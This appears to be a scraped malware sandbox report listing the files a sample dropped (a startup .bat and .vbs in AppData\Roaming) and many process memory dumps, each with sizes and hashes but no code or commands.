4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_893.bat

Filesize
1.9MB

MD5
f8783f60ab5e5665f88d15125937097a

SHA1
d401c0545a1596c34e0a0f5d7f4a8e90c0444b07

SHA256
238be5cbe7d3d26bd815468a35061520c984e73ef6eeefe202ad5a173372f136

SHA512
7173b42b72b2b4bfed091945c1843dfe5acdcc701db37e6432eaabd96ef74252ee21ed01ea67e56ebc12e70248b5eaf176108886a2199ad01fc4928fd51a76b3

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_893.vbs

Filesize
124B

MD5
c925d705f8ea0763659b541186966824

SHA1
4ce4c433873980a105cd1ffa333d227405c8e9fe

SHA256
b6315efc7fa1c0df7f0c5d714df7753bbb3d35253b5ec90445041b11482f0f17

SHA512
1e447ca767410c050357d919ed1e08a2c6ad09013029f179083150adb11bb6016c52a7a204bd554eeb766988c2aebb3c362909feea1057f20b54dabe1fad5957

Download Submit
memory/356-227-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/884-231-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/1064-237-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/1164-224-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/1324-168-0x00007FFA675E0000-0x00007FFA67FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1324-36-0x00000271F7D60000-0x00000271F7D9C000-memory.dmp

Filesize
240KB

Download
memory/1324-5-0x00000271F7BD0000-0x00000271F7BF2000-memory.dmp

Filesize
136KB

Download
memory/1324-9-0x00007FFA675E0000-0x00007FFA67FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1324-11-0x00007FFA675E0000-0x00007FFA67FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1324-58-0x00000271F8240000-0x00000271F83A8000-memory.dmp

Filesize
1.4MB

Download
memory/1324-57-0x00000271F7D40000-0x00000271F7D48000-memory.dmp

Filesize
32KB

Download
memory/1324-56-0x00007FFA675E0000-0x00007FFA67FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1324-47-0x00000271F81C0000-0x00000271F8236000-memory.dmp

Filesize
472KB

Download
memory/1324-0-0x00007FFA675E3000-0x00007FFA675E4000-memory.dmp

Filesize
4KB

Download
memory/1528-235-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/1552-236-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/1596-70-0x00007FFA675E0000-0x00007FFA67FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1596-104-0x00007FFA675E0000-0x00007FFA67FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1596-72-0x00007FFA675E0000-0x00007FFA67FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1596-71-0x00007FFA675E0000-0x00007FFA67FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1756-233-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/1956-232-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/1964-220-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/2080-229-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/2672-221-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/2680-228-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/2756-222-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/2932-226-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/3056-230-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/3120-217-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/3120-171-0x0000000003020000-0x000000000304A000-memory.dmp

Filesize
168KB

Download
memory/4128-223-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/4164-263-0x000002515AF00000-0x000002515AF50000-memory.dmp

Filesize
320KB

Download
memory/4164-281-0x000002515AEE0000-0x000002515AEFE000-memory.dmp

Filesize
120KB

Download
memory/4164-218-0x000002515A640000-0x000002515A95E000-memory.dmp

Filesize
3.1MB

Download
memory/4164-289-0x000002515BA30000-0x000002515BA5A000-memory.dmp

Filesize
168KB

Download
memory/4164-288-0x000002515BB90000-0x000002515BBCA000-memory.dmp

Filesize
232KB

Download
memory/4164-264-0x000002515B010000-0x000002515B0C2000-memory.dmp

Filesize
712KB

Download
memory/4164-265-0x000002515B5E0000-0x000002515B7A2000-memory.dmp

Filesize
1.8MB

Download
memory/4164-269-0x000002515AF50000-0x000002515AF62000-memory.dmp

Filesize
72KB

Download
memory/4164-270-0x000002515AFB0000-0x000002515AFEE000-memory.dmp

Filesize
248KB

Download
memory/4164-287-0x000002515C270000-0x000002515C37A000-memory.dmp

Filesize
1.0MB

Download
memory/4164-280-0x000002515B7B0000-0x000002515B80E000-memory.dmp

Filesize
376KB

Download
memory/4164-282-0x000002515BD40000-0x000002515C266000-memory.dmp

Filesize
5.1MB

Download
memory/4164-284-0x000002515BAE0000-0x000002515BB8A000-memory.dmp

Filesize
680KB

Download
memory/4164-286-0x000002515BA70000-0x000002515BAA2000-memory.dmp

Filesize
200KB

Download
memory/4164-285-0x000002515AF70000-0x000002515AF82000-memory.dmp

Filesize
72KB

Download
memory/4632-238-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/4752-234-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download
memory/4848-225-0x00007FFA441C0000-0x00007FFA441D0000-memory.dmp

Filesize
64KB

Download